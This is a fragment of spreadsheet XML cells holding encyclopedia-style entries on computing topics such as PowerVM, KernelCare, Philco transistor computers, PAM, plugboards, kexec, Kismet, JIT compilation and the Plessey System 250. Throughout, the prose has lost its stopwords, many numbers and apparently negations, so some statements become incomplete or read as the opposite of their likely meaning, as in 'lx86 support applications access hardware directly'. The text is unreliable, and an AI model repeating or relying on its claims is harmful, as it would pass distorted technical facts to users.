    <t>powervm, formerly known advanced power virtualization (apv), chargeable feature power5, power6, power7, power8, power9 power10 servers required support micro-partitions advanced features. support provided linux. description powervm following components: "vet" code, activates firmware required support resource sharing features. installation media virtual server (vios), service partition providing sharing services disk network adapters. installation media lx86, binary translation software, allows linux applications compiled intel platform power-emulation mode. supported linux distribution co-requisite feature.ibm powervm comes three editions: powervm express only supported "express" servers (e.g. power 710/730, 720/740, power blades). limited three partitions, must vios partition. support multiple shared processor pools. withdrawn marketing august 2014.this primarily intended "sandbox" environments powervm standard supported power6, power7 power8 systems. unrestricted partitioning lpars core (20× lpars power7+ power8 servers) maximum 1,000 system). multiple shared processor pools power7 power8 systems only).this common edition production systems. powervm enterprise supported power7 power8 systems only. powervm standard addition live partition mobility (which allows running virtual machines migrate another system) active memory sharing (which intelligently reallocates physical memory multiple running virtual machines). also comparison platform virtualization software high availability cluster multiprocessing linux power kernel-based virtual machine linux based virtual machine developing powerpc support references external links powervm wiki powervm editions formerly advanced power virtualization (apv) powervm editions support overview powervm redbooks powervm virtualization system introduction configuration redbooks powervm virtualization system managing monitoring virtual server commands reference</t>
  </si>
  <si>
    <t>KernelCare</t>
  </si>
  <si>
    <t>kernelcare live kernel patching service provides security patches bugfixes range popular linux kernels installed without rebooting system.kernelcare software commercial product. first beta introduced march 2014 commercially launched 2014. overview kernelcare agent resides user's server. periodically checks kernelcare distribution servers. patches available currently running kernel, kernelcare agent downloads applies patches running kernel. kernelcare patch piece code used substitute vulnerable buggy code kernel. arbitrary code line modification, missing security check, functions, even modified data structures. patch compiled usual, generated code additional information changed code pieces caused original source code modification information apply code pieces. resulting code modifications safely applied running kernel. special kernelcare kernel module applies patches. loads patches kernel address space, sets relocations (i.e., fixes references original kernel code data), safely switches execution path original code updated code blocks. code ensures patch applied safely execute original code blocks moment switching version. also dynamic software updating, field research focusing upgrading programs running kexec, method loading whole kernel running system kgraft, kpatch ksplice, linux kernel live patching technologies developed suse, ksplice, inc. (later acquired oracle), respectively references external links official website</t>
  </si>
  <si>
    <t>Philco computers</t>
  </si>
  <si>
    <t>philco pioneers transistorized computers. after company developed surface barrier transistor, much faster previous point-contact types, awarded contracts military government computers. commercialized derivatives designs became successful business scientific computers. transac (transistor automatic computer) model s-1000 released scientific computer. transac s-2000 mainframe computer system first produced 1958, family compatible machines, increasing performance, released next several years. however, mainframe computer market dominated ibm. other companies could deploy resources development, customer support marketing scale could afford, making competition segment difficult introduction family. philco went bankrupt purchased 1961 ford motor company, computer division carried philco division ford exited computer business 1963. ford company maintained philco mainframe 1981. surface-barrier transistor surface-barrier transistor developed philco 1953 much higher frequency response original point-contact transistors. transistor made thin crystal germanium, electrolytically etched pits either side forming thin base region, order micrometers. philco's process etching united states patent number 2,885,571. philco surface-barrier transistors used tx-0, early models would become product line. although relatively fast, small size devices limited power circuits operating tens milliwatts. military government between 1955 1957, philco built transistor computers aircraft, models c-1000, c-1100, c-1102, intended airborne real-time applications. 1957, c-1102 used civilian sector customer. basicpac an/tyk (first delivery 1961), compac an/tyk (not completed), logicpac systems built army transportable computer systems fieldata concept integrated information management. basicpac transistorized computer 28,672 words 38-bit core memory (including sign parity), available several configurations minimum system, truck-borne mobile version, fully expanded system. basic clock periods microsecond (which gives clock rate mhz), microsecond memory access fixed-point multiplication taking microseconds. input/output paper tape reader punch, teletypewriter. with additional hardware, magnetic tape storage also available, seven devices. instruction basic operation codes nine opcodes cxpq philco contracted navy build cxpq computer. model completed installed david taylor model basin. this design later adapted become commercial transac s-2000. only cxpq built. solo 1955, national security agency navy contracted philco produce computer suitable workstation, architecture based vacuum-tube computer system called atlas already nsa, similar commercial univac 1103. time, philco largest producer surface barrier transistors, type available speed quantities required computer. solo prototype delivered 1958, required extensive debugging nsa. difficulties encountered core memory power supplies. solo used paper tape teleprinter machines input output. solo cost million contained 8,000 transistors. while system extensively used training, testing, research development, additional units ordered. solo removed active service 1963. design solo became commercialized philco's transac model s-1000. commercial s-1000 transac s-1000 scientific computer 36-bit word length 4096 words core memory. packaged container size large office desk, used kilowatts, much less vacuum-tube-based computers similar capacity. 1961 survey, s-1000 computer installations identified.it weighed 1,650 pounds (750 kg). s-2000 transac s-2000 large mainframe system intended business scientific work. 48-bit word length supported calculations fixed point, floating point binary-coded decimal formats. original s-2000 "transac" (transistor automatic computer) released 1958 later designated model 210; used internally philco. similar control data corporation model 1604, 48-bit fully transistorized computer. three succeeding models released series, compatible software original model. model introduced 1960, using micro-alloy diffused field-effect transistors, requiring significant redesign circuits compared original. transac s-2000/philco 210/211 weighed 2,000 pounds (910 kg).by 1964, eighteen model 210, eighteen model seven model systems sold.after philco purchased ford motor company, model introduced 1962 released 1963. 65,535 words 48-bit memory. initially made 6-microsecond core memory, better performance 7094 transistor computer. later upgraded 1964 2-microsecond core memory, gave machine floating-point performance greater 7030 stretch computer. model announced 1964 never built. time competition made philco computer operations longer profitable ford, division closed down. model could carry floating-point multiplication microseconds. each word contained 24-bit instructions bits address information eight bits opcode. there different valid opcodes model 212; invalid opcodes detected halted machine. accumulator register bits, three general-purpose registers bits, index registers bits. main memory size ranged words words. only first model magnetic drum memory; later editions used tape drives. model weighed 6,500 pounds (3.3 short tons; t).software s-2000 initially consisted (translator-assember-compiler), altac, fortran ii-like language differences fortran implementation. cobol compiler also available, targeted business applications. philco 2400 input/output system s-2000. operations reading cards printing carried magnetic tapes, thereby offloading s-2000 relatively slow input/output processing. 2400 24-bit word length could supplied characters words) core memory, rated 3-microsecond cycle time. instruction aimed character use. last philco transac s-2000 model taken service december 1981, years service ford. references external links last s-2000 retirement ford, 1981</t>
  </si>
  <si>
    <t>Pluggable authentication module</t>
  </si>
  <si>
    <t>pluggable authentication module (pam) mechanism integrate multiple low-level authentication schemes high-level application programming interface (api). allows programs rely authentication written independently underlying authentication scheme. first proposed microsystems open software foundation request comments (rfc) 86.0 dated october 1995. adopted authentication framework common desktop environment. stand-alone open-source infrastructure, first appeared linux 3.0.4 august 1996 linux project. currently supported operating system, dragonfly bsd, freebsd, hp-ux, linux, macos, netbsd solaris. since central standard behavior exists, later attempt standardize part x/open unix standardization process, resulting x/open single sign-on (xsso) standard. this standard ratified, standard draft served reference point later implementations (for example, openpam). criticisms since implementations interface remote clients themselves, pam, own, cannot implement kerberos, common type used unix environments. this sso's incorporation "primary authentication" portion would-be xsso standard advent technologies spnego sasl. this lack functionality also reason authentication mechanism negotiation. implementations, pam_krb5 fetches ticket granting tickets, involves prompting user credentials, used initial login environment. fetch service ticket particular application, prompt user enter credentials again, application must specifically coded support kerberos. this pam_krb5 cannot service tickets, although versions pam-krb5 attempting work around issue. also implementations: java authentication authorization service linux openpam identity management general topic name service switch manages user databases system security services daemon implementation based references external links specifications: original solaris x/open single sign-on (xsso) 1997 draft working paperguides: password control wayback machine (archived august 2013) pluggable authentication modules linux making most pluggable authentication modules (pam) oracle solaris administration: security services: using</t>
  </si>
  <si>
    <t>Plugboard</t>
  </si>
  <si>
    <t>plugboard control panel (the term used depends application area) array jacks sockets (often called hubs) patch cords inserted complete electrical circuit. control panels sometimes used direct operation unit record equipment, cipher machines, early computers. unit record equipment main article: unit record equipment earliest machines hardwired specific applications. control panels introduced 1906 hollerith type tabulator (photo type built-in control panel here). removable control panels introduced hollerith (ibm) type tabulator 1920s. applications could wired separate control panels, inserted tabulators needed. removable control panels came used unit record machines machines different applications required rewiring. removable control panels ranged size 1/4" 3/4" (for machines 077, 550, 514) roughly feet (300 side rectangular array hubs. plugs single-conductor patch cord inserted hubs, making connection contacts machine control panel placed machine, thereby connecting emitting accepting entry hub. example, card duplicator application card column reading (emitting) might connected punch magnet entry hub. relatively simple matter copy fields, perhaps different columns, ignore columns suitable wiring. tabulator control panels could require dozens patch cords applications. tabulator functions implemented mechanical electrical components. control panels simplified changing electrical connections different applications, changing tabulator's still required mechanical changes. first tabulator require mechanical changes; 407's functions electrically controlled completely specified application's control panel carriage tape. machines control panels, collators, interpreters, 407, manuals describe control panel "directing" "automatic operation obtained by...". control panels calculators, 604, specified sequence operations, described programs. wiring unit record equipment control panels unit record equipment typically configured specific task using removable control panel. electrical connections various components unit record machine presented panel, connections determined wiring, actual connections made panel inserted machine locked place. perhaps closest modern analog field-programmable gate array, fixed number logic components made available interconnection wiring determined user. wiring unit record control panel required knowledge machine's components timing constraints. components unit record machines synchronized rotating shaft. rotation represented single machine cycle, punched cards would advance station next, line might printed, total might printed cycles divided points according rows punched card would appear read punch station. machines, cards face down, 9-edge (bottom edge) first. thus first point card cycle would 9-time, second time 0-time. times known digits. these would followed time time, also known zones. read station, spring wire brushes pressed card, column (the read station, constructed without brushes, held card stationary could read card multiple times, time generating impulses would generated spring wire station). when hole passed brush, brush would make contact conductive surface beneath card connected electrical power source electrical pulse, impulse terminology, would generated. each brush connected individual control panel, could wired another hub, needed. action caused impulse wire depended cycle occurred, simple form time-division multiplexing. thus impulse occurred 7-time wire connected column punch magnet would punch hole column impulse wire occurred 4-time would punch column impulses timed often came read brushes detected holes punched cards passed brushes, pulses also emitted circuits, counter outputs. zone impulses digit impulses needed alphanumeric printing. they could sent single wire, separated relay circuits based time within cycle. control panel machine type presented exit (output) entry (input) hubs logical arrangements. many places, adjacent common hubs, would connected, allowing wire connected exit entry. groups hubs wired together connected internal circuits. these hubs could used connect multiple wires needed. small connector blocks called wire splits also available join three four wires together, control panel. several visible photo panel. capabilities sophistication unit record machine components evolved first half 20th century often specific needs particular machine type. following groupings typical later machines: read brushes, exit hubs, card column. tabulating machine might three read stations, hubs. reproducing punch might additional read station punch station verification. punch magnets machines could punch cards, reproducing punch, entries card column. impulse entries triggered electromagnet initiated punching hole column position. print entries, print position. impulses entries controlled motion print bars wheels place correct type element print hammers. also exits print wheel could feed counters addition subtraction. this insured totals always matched printed. counter entries. tabulating machine, series would several counters available different sizes. (for example, 402/403 four sets digit counters, labeled etc.) each counter counter control entries specify either addition (plus) subtraction (minus). neither pulsed, operation performed. addition commanded, digit impulse wired column counter entry started counter wheel turning. stopped automatically zero time. thus pulse time caused wheel advance steps, adding value counter position. carries within group performed automatically. carry carry hubs allowed counters coupled, permitting longer numbers accumulated. subtraction complicated used nines complement arithmetic. counter total exits. counter's total entry caused counter emit total pulses could wired print positions. after total printed, counter reset. special circuits allowed negative values printed correctly, nines complements, special exit provided allow appropriate symbol ("cr" "-") printed next number negative. comparing. simple comparing circuits entries exit emitted pulse whenever pulses arrived entries different times. some machines, e.g. collators, could detect number higher equal. tabulating machine might compare account number successive cards print total account number appeared. compare function, implemented would called gate using opposing electromagnets. neither magnet energized magnets energized time, relay armature would move. magnet energized, armature would move touch contacts placed either side. contacts wired together internally connected exit indicated unequal comparison. distributors allowed output pulse wired input without creating back circuit inputs. emitters sets exit hubs automatically generated pulse specified time card cycle. twelve exit hubs wired contacts rotary switch turned card cycle. thus wiring exit emitter punch magnet entry would cause punched position. emitters might used numeric constant value, date, every card. alphanumeric constant data could created carefully combining digit zone pulses. later machines, also complete alphanumeric emitters required wire use. selectors directed pulse common entry either outputs, depending whether relay magnet energized. many types selectors employed differed "pickup" relay energized. simplest case, immediate entries, magnet energized pulse received held remainder cycle. more complex selectors, called pilot selectors, entry caused selector magnet pick next machine cycle, entry also delayed triggered pulse. one-cycle delay needed cases, time pulse detected late reliably take action cycle. co-selectors immediate input, five sets contacts typically triggered pilot selector's coupling exit, hence names. digit selectors similar emitters, exit cycle point, also entry switched successive exit hubs cycle progressed. digit selector could converted digit emitter wiring entry constant source cycle pulses. could also signals used detect particular digit. wiring first read brush digit selector's entry connecting, say, exit pilot selector's entry would cause selector transfer next read cycle punched first read brush's column. column splits relays energized 12-time, allowing digit pulses separated zone pulses. storage. later machines could store several values later use, means mechanical device somewhat similar emitter, except contained sliding contact determined time point impulse emitted. contact slider positioned electro-mechanically value stored, stayed position storage cleared. cypher machines plugboard used famous enigma machine; removable. case plugboard acted "fourth rotor" rotor machine's workings. plugboard wirings part "day settings" specified rotors insert slot, plugboard connections make. practice plugboard improve security cypher generated, change every keypress, unlike rotors, impact limited. cryptanalysis enigma. early computers first version eniac computer programmed cabling, switches plugboards. eniac's cabling later reconfigured existing function tables data memory program memory (the switches plugboards continued used reconfigured eniac). ramac used plugboard program compare operations branch operations. other plugboards controlled card reading punching, printer console typewriter. many peripheral devices, e.g. 716, first second generation computers, including 700/7000 series 650, based unit record machines included plugboards. plugboards remained specialty-purpose computers time, acting read memory (rom) able manually reprogrammed field. example ferranti argus computer, used bristol bloodhound missile, feature plugboard programmed inserting small ferrite rods slots, effect creating read-only core memory hand. also enigma machine powers-samas british manufacturer unit record equipment used removable "connection-box" mechanical linkages instead plug board. telephone switchboard breadboard, term solderless plugboard used prototyping electronics. references (1956). punched card data processing equipment: functional wiring principles (pdf). 22-6275-0. archived original (pdf) 2010-08-09. retrieved 2007-11-06. brooks jr., frederick iverson, kenneth (1963) automatic data processing, wiley, 494pp. well written descriptions unit record machines control panel wiring, remington rand. external links columbia university computing history: control panels archives: control panel photo.</t>
  </si>
  <si>
    <t>Proxmox Backup Server</t>
  </si>
  <si>
    <t>proxmox backup server (short proxmox open-source backup software project supporting virtual machines, containers, physical hosts. bare-metal server based debian linux distribution, extended features, out-of-the-box support linux kernel lts. proxmox backup server licensed affero general public license, version technology proxmox backup server written mostly rust implements data deduplication reduce storage space needed. data split chunks. history development proxmox backup originally began october 2018 provide efficient backup virtualization platform proxmox virtual environment integrated vzdump backup tool allows full backups. july 2020, first public beta announced. first stable release announced november, 2020. operation proxmox backup uses client-server model server stores backup data. client tool works modern linux systems. software installed bare-metal image, includes management tools web-based gui. administrators manage system browser command-line interface (cli). proxmox backup server also provides rest third party tools. proxmox backup server supports incremental backups, data deduplication, zstandard compression authenticated encryption (ae). first backup full backup, subsequent backups sent incrementally client proxmox backup server, data deduplicated. proxmox platform, proxmox backup client tightly integrated; backup storage configurable storage backend proxmox node supports deduplicated backups qemu virtual machines containers. platform also leverages qemu dirty-bitmaps, allows fast backups proxmox client server, disk images need scanned changes. backups stored on-premises synchronized remote locations remotes, multiple, unrelated hosts backup server. client-server traffic transferred tls-1.3 protect eavesdropping. protect backup data rest, optional encryption backed-up-data available using aes-256 galois/counter mode. backup server access backup data without matching encryption keys, even untrusted host. data retention policy defined proxmox backup server. removing expired data done phases: first, prune removes indices backups longer needed, garbage collector process running physically delete orphaned data chunks. also bacula amanda references external links official website</t>
  </si>
  <si>
    <t>Kexec</t>
  </si>
  <si>
    <t>kexec, abbreviated kernel execute analogous unix/linux kernel call exec, mechanism linux kernel allows booting kernel currently running one. essentially, kexec skips bootloader stage hardware initialization phase performed system firmware (bios uefi), directly loads kernel main memory starts executing immediately. this avoids long times associated full reboot, help systems meet high-availability requirements minimizing downtime.while feasible, implementing mechanism kexec raises major challenges: memory currently running kernel overwritten kernel, still executing. kernel usually expect hardware devices well defined state, system reboot system firmware resets "sane" state. bypassing real reboot leave devices unknown state, kernel recover that.support allowing signed kernels booted kexec merged version 3.17 linux kernel mainline, released october 2014. this disallows root user load arbitrary code kexec execute complementing uefi secure boot in-kernel security mechanisms ensuring signed linux kernel modules inserted running kernel.kexec used linuxboot boot main kernel linux kernel located firmware. also kdump (linux) linux kernel's crash dump mechanism, internally uses kexec kernel relocation linux feature kernel compiled bootable variety different memory addresses kgraft linux kernel live patching technology developed suse kpatch linux kernel live patching technology developed ksplice linux kernel live patching technology developed ksplice, inc. later bought oracle references</t>
  </si>
  <si>
    <t>Proxify</t>
  </si>
  <si>
    <t>proxify partly free, single-serving website enables users communicate anonymously internet. example proxify tunnel, already created listening localhost. this done using putty dynamically listen host redirecting traffic tunnel. proxify used hook applications using tunnel without configuring different applications itself. proxify matches registration information whois database, reassurance. there three general pre-configured options (max speed, security, compatibility) users able tweak settings otherwise.although free searches offered, message appear: proxify experiencing higher normal traffic volume. must restrict access free service peak usage times ensure best possible experience paid subscribers. please login account signup immediate access. because uses https protocol, considered secure eavesdropping man-in-the-middle attacks, disadvantage requiring users connect particular addresses, making fairly easy block almost firewall. also internet censorship circumvention references external links official website</t>
  </si>
  <si>
    <t>Kismet (software)</t>
  </si>
  <si>
    <t>kismet network detector, packet sniffer, intrusion detection system 802.11 wireless lans. kismet work wireless card supports monitoring mode, sniff 802.11a, 802.11b, 802.11g, 802.11n traffic. program runs linux, freebsd, netbsd, openbsd, macos. client also microsoft windows, although, aside external drones (see below), there's supported wireless hardware available packet source. distributed general public license, kismet free software. features kismet differs wireless network detectors working passively. namely, without sending loggable packets, able detect presence wireless access points wireless clients, associate other. also widely used date open source wireless monitoring tool. kismet also includes basic wireless features detecting active wireless sniffing programs including netstumbler, well number wireless network attacks. kismet features ability sniffed packets save tcpdump/wireshark airsnort compatible file format. kismet also capture "per-packet information" headers. kismet also features ability detect default "not configured" networks, probe requests, determine level wireless encryption used given access point. order find many networks possible, kismet supports channel hopping. this means constantly changes channel channel non-sequentially, user-defined sequence default value leaves holes channels (for example, 1-6-11-2-7-12-3-8-13-4-9-14-5-10). advantage method capture packets adjacent channels overlap. kismet also supports logging geographical coordinates network input receiver additionally available. server drone client infrastructure kismet three separate parts. drone used collect packets, pass server interpretation. server either used conjunction drone, own, interpreting packet data, extrapolating wireless information, organizing client communicates server displays information server collects. plugins with updating kismet -ng, kismet supports wide variety scanning plugins including dect, bluetooth, others. usage kismet used number commercial open source projects. distributed kali linux. used wireless reconnaissance, used packages inexpensive wireless intrusion detection system. used number peer reviewed studies "detecting rogue access points using kismet". also kismac (for backtrack kali linux metasploit project nmap backbox openvas aircrack-ng references external links official website introduction kismet (via archive.org) java kismet tcp/ip client</t>
  </si>
  <si>
    <t>PowerVM Lx86</t>
  </si>
  <si>
    <t>powervm lx86 binary translation layer ibm's system servers. enabled 32-bit linux binaries unmodified power isa-based hardware. used feature migrate linux servers powervm virtualized environment; supported power5 power6 hardware well bladecenter js21 js22 systems. contrast regular emulators instructions translated, entire system, thus making fast flexible. lx86 software senses executing code translates powerpc code execution, instructions later cached ensuring translation process take place once, reducing drop performance usually associated emulation. lx86 support applications access hardware directly, like kernel modules. earlier versions lx86 code makes instructions, though version 1.3.2 sse2 instruction sets supported. product first marketed system (system application virtual environment) incorrectly reported pave (portable advanced virtualization emulator) press name since changed powervm lx86. lx86 based quicktransit dynamic translator transitive, apple uses rosetta emulation layer enables unmodified powerpc binaries intel-based macintoshes. versions releases lx86 product withdrawn marketing september 2011, support discontinued april 2013. references powervm lx86 linux applications book getting started powervm lx86 white paper linux application consolidation power systems platforms using virtualization technologies powervm lx86 ibm's developerworks ibm's press release 2007-04-23 transitive's press release 2007-04-23 applications ibm's powerpc servers heise online opens beta pave linux runtime power chips, four hundred withdrawal announcement 911-170</t>
  </si>
  <si>
    <t>Just-in-time compilation</t>
  </si>
  <si>
    <t>computing, just-in-time (jit) compilation (also dynamic translation run-time compilations) executing computer code involves compilation execution program time) rather execution. this consist source code translation commonly bytecode translation machine code, executed directly. system implementing compiler typically continuously analyses code executed identifies parts code speedup gained compilation recompilation would outweigh overhead compiling code. compilation combination traditional approaches translation machine code—ahead-of-time compilation (aot), interpretation—and combines advantages drawbacks both. roughly, compilation combines speed compiled code flexibility interpretation, overhead interpreter additional overhead compiling linking (not interpreting). compilation form dynamic compilation, allows adaptive optimization dynamic recompilation microarchitecture-specific speedups. interpretation compilation particularly suited dynamic programming languages, runtime system handle late-bound data types enforce security guarantees. history earliest published compiler generally attributed work lisp john mccarthy 1960. seminal paper recursive functions symbolic expressions computation machine, part mentions functions translated runtime, thereby sparing need save compiler output punch cards (although would accurately known "compile system"). another early example thompson, 1968 gave first applications regular expressions, pattern matching text editor qed. speed, thompson implemented regular expression matching jiting 7094 code compatible time-sharing system. influential technique deriving compiled code interpretation pioneered james mitchell 1970, implemented experimental language lc².smalltalk 1983) pioneered aspects compilations. example, translation machine code done demand, result cached later use. when memory became scarce, system would delete code regenerate needed again. sun's self language improved techniques extensively point fastest smalltalk system world, achieving half speed optimized fully object-oriented language. self abandoned sun, research went java language. term "just-in-time compilation" borrowed manufacturing term "just time" popularized java, james gosling using term 1993. currently jiting used implementations java virtual machine, hotspot builds extensively uses, research base. project dynamo experimental compiler 'bytecode' format machine code format same; system turned pa-6000 machine code pa-8000 machine code. counterintuitively, resulted speed ups, cases since permitted optimizations machine code level, example, inlining code better cache usage optimizations calls dynamic libraries many run-time optimizations conventional compilers able attempt.in november 2020, introduced compiler. design bytecode-compiled system, source code translated intermediate representation known bytecode. bytecode machine code particular computer, portable among computer architectures. bytecode interpreted virtual machine. compiler reads bytecodes many sections full, rarely) compiles dynamically machine code program faster. this done per-file, per-function even arbitrary code fragment; code compiled executed (hence name "just-in-time"), cached reused later without needing recompiled. contrast, traditional interpreted virtual machine simply interpret bytecode, generally much lower performance. some interpreters even interpret source code, without step first compiling bytecode, even worse performance. statically-compiled code native code compiled prior deployment. dynamic compilation environment compiler used execution. common goal using techniques reach surpass performance static compilation, maintaining advantages bytecode interpretation: much "heavy lifting" parsing original source code performing basic optimization often handled compile time, prior deployment: compilation bytecode machine code much faster compiling source. deployed bytecode portable, unlike native code. since runtime control compilation, like interpreted bytecode, secure sandbox. compilers bytecode machine code easier write, portable bytecode compiler already done much work. code generally offers better performance interpreters. addition, cases offer better performance static compilation, many optimizations feasible run-time: compilation optimized targeted operating system model application runs. example, choose sse2 vector instructions detects supports them. obtain level optimization specificity static compiler, must either compile binary intended platform/architecture, else include multiple versions portions code within single binary. system able collect statistics program actually running environment rearrange recompile optimum performance. however, static compilers also take profile information input. system global code optimizations (e.g. inlining library functions) without losing advantages dynamic linking without overheads inherent static compilers linkers. specifically, global inline substitutions, static compilation process need run-time checks ensure virtual call would occur actual class object overrides inlined method, boundary condition checks array accesses need processed within loops. with just-in-time compilation many cases processing moved loops, often giving large increases speed. although possible statically compiled garbage collected languages, bytecode system easily rearrange executed code better cache utilization.because must render execute native binary image runtime, true machine-code jits necessitate platforms allow data executed runtime, making using jits harvard architecture-based machine impossible; said certain operating systems virtual machines well. however, special type "jit" potentially target physical machine's architecture, rather optimized bytecode limitations machine code prevail, especially bytecode's eventually leverages native code. performance causes slight noticeable delay initial execution application, time taken load compile bytecode. sometimes delay called "startup time delay" "warm-up time". general, optimization performs, better code generate, initial delay also increase. compiler therefore make trade-off compilation time quality code hopes generate. startup time include increased io-bound operations addition compilation: example, rt.jar class data file java virtual machine (jvm) must seek data contextually huge file.one possible optimization, used sun's hotspot java virtual machine, combine interpretation compilation. application code initially interpreted, monitors sequences bytecode frequently executed translates machine code direct execution hardware. bytecode executed times, saves compilation time reduces initial latency; frequently executed bytecode, compilation used high speed, initial phase slow interpretation. additionally, since program spends time executing minority code, reduced compilation time significant. finally, initial code interpretation, execution statistics collected compilation, helps perform better optimization.the correct tradeoff vary circumstances. example, sun's java virtual machine major modes—client server. client mode, minimal compilation optimization performed, reduce startup time. server mode, extensive compilation optimization performed, maximize performance application running sacrificing startup time. other java just-in-time compilers used runtime measurement number times method executed combined bytecode size method heuristic decide compile. still another uses number times executed combined detection loops. general, much harder accurately predict methods optimize short-running applications long-running ones.native image generator (ngen) microsoft another approach reducing initial delay. ngen pre-compiles "pre-jits") bytecode common intermediate language image machine native code. result, runtime compilation needed. .net framework shipped visual studio 2005 runs ngen microsoft library dlls right installation. pre-jitting provides improve startup time. however, quality code generates might good jited, reasons code compiled statically, without profile-guided optimization, cannot good compiled code extreme case: lack profiling data drive, instance, inline caching.there also exist java implementations combine (ahead-of-time) compiler either compiler (excelsior jet) interpreter (gnu compiler java). security compilation fundamentally uses executable data, thus poses security challenges possible exploits. implementation compilation consists compiling source code byte code machine code executing this generally done directly memory: compiler outputs machine code directly memory immediately executes rather outputting disk invoking code separate program, usual ahead time compilation. modern architectures runs problem executable space protection: arbitrary memory cannot executed, otherwise potential security hole. thus memory must marked executable; security reasons done code written memory, marked read-only, writable/executable memory security hole (see w^x). instance firefox's compiler javascript introduced protection release version firefox 46.jit spraying class computer security exploits compilation heap spraying: resulting memory executable, allows exploit execution moved heap. uses compilation applied programs, used certain capacities, particularly dynamic capacities regular expressions. example, text editor compile regular expression provided runtime machine code allow faster matching: cannot done ahead time, pattern provided runtime. several modern runtime environments rely compilation high-speed code execution, including implementations java, together microsoft's .net. similarly, many regular-expression libraries feature compilation regular expressions, either bytecode machine code. compilation also used emulators, order translate machine code architecture another. common implementation compilation first compilation bytecode (virtual machine code), known bytecode compilation, compilation machine code (dynamic compilation), rather interpretation bytecode. this improves runtime performance compared interpretation, cost compilation. compilers translate continuously, interpreters, caching compiled code minimizes future execution code given run. since part program compiled, significantly less entire program compiled prior execution. also binary translation common language runtime dynamic compilation lightning llvm ovpsim self-modifying code tracing just-in-time compilation transmeta crusoe notes references further reading aycock, (june 2003). brief history just-in-time". computing surveys. (2): 97–113. citeseerx 10.1.1.97.3985. doi:10.1145/857076.857077. s2cid 15345671. thompson, (1968). "programming techniques: regular expression search algorithm". communications acm. (6): 419–422. doi:10.1145/363347.363387. s2cid 21260384. external links free online dictionary computing entry mozilla nanojit archived 2012-05-09 wayback machine: small, cross-platform library emits machine code. used mozilla tamarin spidermonkey javascript engines. profiling runtime generated interpreted code using vtune performance analyzer</t>
  </si>
  <si>
    <t>Plessey System 250</t>
  </si>
  <si>
    <t>plessey system 250, also known pp250, first operational computer implement capability-based addressing, check balance computation pure church–turing machine. plessey built systems british army message routing project. description church–turing machine digital computer encapsulates symbols thread computation chain protected abstractions enforcing dynamic binding laws alonzo church's lambda calculus other capability based computers, include cheri computers, hybrids. they retain default instructions access every word accessible physical logical (paged) memory.it unavoidable characteristic neumann architecture founded shared random access memory trust sharing default access rights. example, every word every page managed virtual memory manager operating system using memory management unit (mmu) must trusted. using default privilege among many compiled programs allows corruption grow without method error detection. however, range virtual addresses given range physical addresses produced shared undetected corruption flows across shared memory space software function another. pp250 removed virtual memory centralized, precompiled operating system, also superuser, removing default machine privileges. default privileges empower undetected malware hacking computer. instead, pure object capability model pp250 always requires limited capability define authority operate. pp250 separated binary data capability data protect access rights, simplify computer speed garbage collection. church machine encapsulates context limits turing machine enforcing laws lambda calculus. typed digital media program controlled distinctly different machine instructions. mutable binary data programmed risc instruction imperative programming procedural programming binary data using binary data registers confined capability limited memory segment. immutable capability keys, exclusive church instructions, navigate computational context turing machine separately programmed structure object-capability model. immutable capability keys represent named lambda calculus variables. this church side lambda calculus meta-machine. side object-oriented machine binary objects, programmed functions, capability lists defining function abstractions, storage threads computation (lambda calculus applications) storage list capability keys namespace. laws lambda calculus implemented church instructions micro-programmed access reserved (hidden) capability registers. software incrementally assembled object-oriented machine-code linked capability keys. structure function abstractions, including memory management, input, output, scheduling communication services protected private frames thread. threads computer inline parallel computations activated program controlled church instruction. conceptually, pp250 operates dead center church–turing thesis digitally secure, functional church–turing machine trusted software. real-time controller, pp250 provided fail-safe software applications computerized telephone military communication systems decades software hardware reliability. capability limited addressing detects recovers errors contact without harmful corruption information theft. furthermore, unfair, default privileges exist operating system superuser, thereby blocking hacking malware. multiprocessing hardware architecture dynamically bound, type limited memory, exclusively accessed capability limited addressing, replace statically bound, page based linear compilations dynamically bound instructions, crosschecked authorized time. checking memory references offset within base, limit, access types specified bugs, errors attacks detected type limited capability register. imperative turing commands must bind binary data objects defined selected capability register. access rights selected capability register must approve data access rights (read binary data, write binary data execute machine code). hand, functional church instructions bound dynamically capability capability list held capability register capability access rights (load capability key, save capability enter capability list). way, object-oriented machine code encapsulated function abstraction private execution space. this pp250 unlike stretched neumann architecture. instead, lambda calculus meta-machine scales 'single tape' turing machine network 'enter' capability keys representing functional nodes lambda calculus namespace register-oriented architecture, program accessible data registers program accessible capability registers. data registers 24-bit; capability registers 48-bit contain base address segment capability refers, size segment, access rights granted capability. capabilities memory 24-bit contain access rights index system capability table segment capability refers; entries table contain segment base address length segment entry refers.instructions access memory opcode, field specifying data register operand, field specifying data register used index register containing offset segment, field specifying capability register referring segment containing memory location, field containing base offset segment. offset segment base offset contents index register.the software modular based universal model computation lambda calculus. church instructions hide details named function application using capability keys typed concepts variables, functions, abstractions, applications namespace. instead binding instructions static linear memory default shared privilege used malware hackers, instructions bound typed protected, private digital objects using capability keys capability-based security system immutable mathematical symbols. resulting object oriented machine code achieved many decades trusted software reliably mathematically pure, industrial strength computer science. history manufactured plessey company united kingdom 1970, successfully deployed ministry defence british army ptarmigan project served first gulf tactical mobile communication network switch. pp250 sold commercially circa 1972. also army communications information systems (united kingdom) flex machine references external links england (august 1974). capability concept mechanisms structure system (pdf). international workshop protection operating systems. photograph multiprocessor system (1975) book pp250 results</t>
  </si>
  <si>
    <t>Justniffer</t>
  </si>
  <si>
    <t>justniffer packet sniffer. network traffic 'standard' (web server-like) customized way. also response times, useful tracking network services performances (e.g. server, application server, etc.). output format traffic easily customized. example written python (delivered official package) stores transferred contents output directory separated domains. this means transferred files like html, css, javascript, images, sounds, etc. saved directory. overview justniffer born help troubleshooting performance network tcp-based services: http, rtsp, sip, smtp, imap, pop, ldap, telnet etc. collect high level protocol performance information, reconstructing flow reliable using portions linux kernel code. uses slightly modified version libnids libraries already include modified version linux kernel code reusable way. extended external scripts (bash, python, executable) generate logs customizable page justniffer explains options. external links official website justniffer packet sniffer lars michelsen examples examples grab http traffic observe grab http traffic also comparison packet analyzers tcpdump, packet analyzer pcap, application programming interface (api) capturing network traffic snoop, command line packet analyzer included solaris wireshark, network packet analyzer dsniff, packet sniffer traffic analysis tools netsniff-ng, free linux networking toolkit ngrep, tool match regular expressions within network packet payloads etherape, network mapping tool relies sniffing traffic tcptrace, tool analyzing logs produced tcpdump microsoft network monitor, packet analyzer</t>
  </si>
  <si>
    <t>Key Management Interoperability Protocol</t>
  </si>
  <si>
